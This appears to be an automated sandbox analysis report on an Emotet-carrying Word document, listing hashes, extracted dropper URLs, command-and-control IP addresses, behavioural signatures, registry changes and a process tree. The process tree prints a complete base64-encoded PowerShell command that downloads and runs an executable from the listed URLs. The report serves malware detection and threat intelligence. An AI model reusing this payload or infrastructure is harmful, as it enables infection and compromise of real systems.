emotet | 24750ed2a7cbc122fca96df6f6ed3a3b879906272abbbcc636db5a6a441f68d2

General

Target

BLT2009.doc
Size

163KB
MD5

3bed1986a9ac94fba68c471fb4bcfc20
SHA1

9b8a01bc85ac72c25311bb8b934be6071ffedeb9
SHA256

24750ed2a7cbc122fca96df6f6ed3a3b879906272abbbcc636db5a6a441f68d2
SHA512

7f9870114bb40a322b3013053505319774d04f20a11840b391c4a668c84f285ccc5ca2df5ad201d6bd7263434483bb7cdb49fadaed74626dfa9625fbeb86617b

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://dheeranet.com/Pej/

exe.dropper

http://playschoolmatritva.com/cgi-bin/Uh/

exe.dropper

http://dikshadayal.com/cgi-bin/Zl78esq/

exe.dropper

http://new.mylicense.ca/5aiibj/vS2/

exe.dropper

http://nucleokardecistalace.org.br/wp-includes/HviA/

exe.dropper

http://britanniacricketleague.com/wp-admin/3qc8lQB/

exe.dropper

https://www.hhbiao.com/ro/4Kh/

Extracted

Family

emotet

C2

71.72.196.159:80

134.209.36.254:8080

120.138.30.150:8080

94.23.216.33:80

157.245.99.39:8080

137.59.187.107:8080

94.23.237.171:443

61.19.246.238:443

156.155.166.221:80

50.35.17.13:80

153.137.36.142:80

91.211.88.52:7080

209.141.54.221:8080

185.94.252.104:443

174.45.13.118:80

87.106.136.232:8080

62.75.141.82:80

213.196.135.145:80

188.219.31.12:80

82.80.155.43:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1664	1100	powershell.exe

Emotet Payload 8 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/304-14-0x00000000002D0000-0x00000000002E2000-memory.dmp	emotet
behavioral1/memory/304-14-0x00000000002D0000-0x00000000002E2000-memory.dmp	emotet
behavioral1/memory/304-15-0x0000000000240000-0x0000000000250000-memory.dmp	emotet
behavioral1/memory/304-15-0x0000000000240000-0x0000000000250000-memory.dmp	emotet
behavioral1/memory/552-19-0x00000000001C0000-0x00000000001D2000-memory.dmp	emotet
behavioral1/memory/552-19-0x00000000001C0000-0x00000000001D2000-memory.dmp	emotet
behavioral1/memory/552-20-0x00000000001E0000-0x00000000001F0000-memory.dmp	emotet
behavioral1/memory/552-20-0x00000000001E0000-0x00000000001F0000-memory.dmp	emotet

Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1664 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Kvc2gdn.exeaaclient.exe

pid process

304 Kvc2gdn.exe
552 aaclient.exe

flow	pid	process
6	1664	powershell.exe

pid	process
304	Kvc2gdn.exe
552	aaclient.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exeKvc2gdn.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\PlaySndSrv\aaclient.exe	Kvc2gdn.exe

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DD03F03-60AE-4AD2-94C0-060ED51B06C7}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{4DD03F03-60AE-4AD2-94C0-060ED51B06C7}\2.0\HELPDIR	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DD03F03-60AE-4AD2-94C0-060ED51B06C7}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1496 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeaaclient.exe

pid process

1664 powershell.exe
1664 powershell.exe
552 aaclient.exe
552 aaclient.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1664 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1496 WINWORD.EXE
1496 WINWORD.EXE

pid	process
1496	WINWORD.EXE

pid	process
1664	powershell.exe
1664	powershell.exe
552	aaclient.exe
552	aaclient.exe

description	pid	process
Token: SeDebugPrivilege	1664	powershell.exe

pid	process
1496	WINWORD.EXE
1496	WINWORD.EXE

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

powershell.exeKvc2gdn.exe

description	pid	process	target process
PID 1664 wrote to memory of 304	1664	powershell.exe	Kvc2gdn.exe
PID 1664 wrote to memory of 304	1664	powershell.exe	Kvc2gdn.exe
PID 1664 wrote to memory of 304	1664	powershell.exe	Kvc2gdn.exe
PID 1664 wrote to memory of 304	1664	powershell.exe	Kvc2gdn.exe
PID 304 wrote to memory of 552	304	Kvc2gdn.exe	aaclient.exe
PID 304 wrote to memory of 552	304	Kvc2gdn.exe	aaclient.exe
PID 304 wrote to memory of 552	304	Kvc2gdn.exe	aaclient.exe
PID 304 wrote to memory of 552	304	Kvc2gdn.exe	aaclient.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BLT2009.doc"
1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encod JABNAHUAcQB4AGoAcwBiAD0AKAAoACcAQwAnACsAJwBiADEAJwApACsAKAAnAG0ANwAnACsAJwBfADAAJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AVgA6AHUAcwBlAHIAcABSAE8AZgBJAEwAZQBcAEQARgBiAHEAbQBLADUAXABBAF8AagB6ADQATwA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAEUAQwB0AE8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAGAAUgBgAEkAdABZAHAAcgBgAE8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAMQAnACsAJwAyACcAKwAoACcALAAgAHQAbAAnACsAJwBzADEAMQAnACsAJwAsACAAdAAnACkAKwAnAGwAcwAnACkAOwAkAEsAagA5ADcAbwBiAGsAIAA9ACAAKAAoACcASwAnACsAJwB2AGMAJwApACsAKAAnADIAZwBkACcAKwAnAG4AJwApACkAOwAkAEMANQBfADUAagBpADUAPQAoACcATAAnACsAJwBfAHAAJwArACgAJwA1ACcAKwAnAHYAeQBnACcAKQApADsAJABMADgAMQBfADUAcwA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHQAOQAnACsAKAAnADEAJwArACcARABmAGIAcQAnACkAKwAnAG0AawAnACsAKAAnADUAJwArACcAdAA5ADEAQQAnACsAJwBfACcAKQArACgAJwBqAHoAJwArACcANABvACcAKwAnADUAdAA5ACcAKQArACcAMQAnACkALQBDAHIAZQBwAGwAYQBjAEUAKAAnAHQAJwArACcAOQAxACcAKQAsAFsAYwBIAEEAUgBdADkAMgApACsAJABLAGoAOQA3AG8AYgBrACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABDAHkAbgBsAHYAcgBiAD0AKAAoACcAQQA4AGoAaAAnACsAJwBtAGMAJwApACsAJwAzACcAKQA7ACQARQBhAGoANwB0ADAAcgA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AEUAYgBjAGwASQBFAE4AdAA7ACQAWABhAHkAZAB3ADQANgA9ACgAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAGQAJwArACcAaABlAGUAcgBhAG4AZQAnACkAKwAoACcAdAAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAFAAJwApACsAKAAnAGUAagAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHAAbABhACcAKwAnAHkAcwBjACcAKQArACgAJwBoAG8AJwArACcAbwBsAG0AYQB0AHIAJwArACcAaQAnACkAKwAoACcAdAB2AGEAJwArACcALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAYwBnAGkAJwArACcALQBiAGkAbgAvACcAKQArACcAVQAnACsAKAAnAGgAJwArACcALwAqAGgAJwApACsAJwB0ACcAKwAoACcAdAAnACsAJwBwADoAJwApACsAKAAnAC8ALwBkACcAKwAnAGkAawAnACkAKwAoACcAcwBoAGEAJwArACcAZABhACcAKQArACgAJwB5AGEAJwArACcAbAAuAGMAJwApACsAKAAnAG8AJwArACcAbQAnACsAJwAvAGMAZwBpAC0AJwApACsAKAAnAGIAaQAnACsAJwBuAC8AWgAnACkAKwAoACcAbAA3ADgAJwArACcAZQBzACcAKQArACgAJwBxAC8AKgBoAHQAJwArACcAdABwADoALwAnACsAJwAvAG4AJwApACsAKAAnAGUAJwArACcAdwAuAG0AJwArACcAeQBsAGkAJwApACsAKAAnAGMAJwArACcAZQBuACcAKQArACgAJwBzACcAKwAnAGUALgBjAGEAJwApACsAKAAnAC8ANQAnACsAJwBhACcAKQArACgAJwBpACcAKwAnAGkAYgAnACkAKwAoACcAagAvAHYAUwAnACsAJwAyAC8AKgAnACsAJwBoAHQAdAAnACsAJwBwADoAJwApACsAKAAnAC8AJwArACcALwBuACcAKQArACcAdQBjACcAKwAoACcAbAAnACsAJwBlAG8AJwApACsAJwBrAGEAJwArACgAJwByAGQAZQBjAGkAJwArACcAcwB0ACcAKwAnAGEAbABhACcAKwAnAGMAJwApACsAKAAnAGUAJwArACcALgBvACcAKQArACgAJwByAGcALgAnACsAJwBiAHIAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgAnACsAJwBjAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8ASAAnACsAJwB2ACcAKwAoACcAaQBBACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AJwApACsAKAAnAGIAJwArACcAcgBpACcAKQArACgAJwB0ACcAKwAnAGEAbgAnACkAKwAoACcAbgBpACcAKwAnAGEAYwAnACkAKwAoACcAcgAnACsAJwBpAGMAawBlAHQAJwApACsAJwBsACcAKwAoACcAZQBhAGcAdQBlAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKwAnAHAALQBhAGQAbQBpACcAKwAnAG4AJwApACsAJwAvACcAKwAnADMAcQAnACsAKAAnAGMAJwArACcAOABsACcAKQArACgAJwBRAEIAJwArACcALwAqAGgAJwArACcAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AdwB3AHcAJwApACsAKAAnAC4AaABoAGIAaQBhACcAKwAnAG8ALgBjAG8AJwArACcAbQAvACcAKQArACcAcgAnACsAKAAnAG8ALwA0ACcAKwAnAEsAaAAnACkAKwAnAC8AJwApAC4AIgBzAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEUAbAB1AHAAcwBoAGUAPQAoACcARwAxACcAKwAoACcAOAAnACsAJwA3AHUAZgAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASgAxAF8AaAA3AGkAdQAgAGkAbgAgACQAWABhAHkAZAB3ADQANgApAHsAdAByAHkAewAkAEUAYQBqADcAdAAwAHIALgAiAGQAbwBXAG4ATABgAE8AYABBAEQAZgBgAEkAbABlACIAKAAkAEoAMQBfAGgANwBpAHUALAAgACQATAA4ADEAXwA1AHMAOAApADsAJABMAHAAeAB0ADEAYwB1AD0AKAAnAFUAOQAnACsAKAAnADUAbQAwACcAKwAnAHcAJwApACsAJwB4ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABMADgAMQBfADUAcwA4ACkALgAiAGwAYABFAG4AYABnAHQAaAAiACAALQBnAGUAIAAyADcANAA0ADQAKQAgAHsALgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAoACQATAA4ADEAXwA1AHMAOAApADsAJABBAHgAawBkADIAZgA3AD0AKAAoACcATQBjACcAKwAnADcAJwApACsAKAAnAHUAZwAnACsAJwByACcAKQArACcANwAnACkAOwBiAHIAZQBhAGsAOwAkAE4AMwA5AHAAaQB5AGUAPQAoACcAWQAnACsAJwB5ACcAKwAoACcAdgBvACcAKwAnADQAOAB4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABOAHgAdQBzAHIAeQB6AD0AKAAnAFQAXwAnACsAKAAnAGkAJwArACcAXwB5AGIAJwApACsAJwB3ACcAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664

C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe
"C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:304

C:\Windows\SysWOW64\PlaySndSrv\aaclient.exe
"C:\Windows\SysWOW64\PlaySndSrv\aaclient.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:552

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\DFbqmK5\A_jz4O5\Kvc2gdn.exe

Download Submit
C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe

Download Submit
C:\Windows\SysWOW64\PlaySndSrv\aaclient.exe

Download Submit
memory/304-14-0x00000000002D0000-0x00000000002E2000-memory.dmp

Filesize
72KB

Download
memory/304-15-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/304-12-0x0000000000000000-mapping.dmp

Download
memory/552-20-0x00000000001E0000-0x00000000001F0000-memory.dmp

Filesize
64KB

Download
memory/552-19-0x00000000001C0000-0x00000000001D2000-memory.dmp

Filesize
72KB

Download
memory/552-17-0x0000000000000000-mapping.dmp

Download
memory/1496-4-0x00000000070C0000-0x00000000072C0000-memory.dmp

Filesize
2.0MB

Download
memory/1496-2-0x0000000008C10000-0x0000000008C14000-memory.dmp

Filesize
16KB

Download
memory/1664-7-0x000000001AB50000-0x000000001AB51000-memory.dmp

Filesize
4KB

Download
memory/1664-11-0x000000001C2F0000-0x000000001C2F1000-memory.dmp

Filesize
4KB

Download
memory/1664-10-0x000000001B860000-0x000000001B861000-memory.dmp

Filesize
4KB

Download
memory/1664-9-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/1664-8-0x000000001AA60000-0x000000001AA61000-memory.dmp

Filesize
4KB

Download
memory/1664-6-0x0000000002380000-0x0000000002381000-memory.dmp

Filesize
4KB

Download
memory/1664-5-0x000007FEE95F0000-0x000007FEE9FDC000-memory.dmp

Filesize
9.9MB

Download
memory/1672-21-0x000007FEF5310000-0x000007FEF558A000-memory.dmp

Filesize
2.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads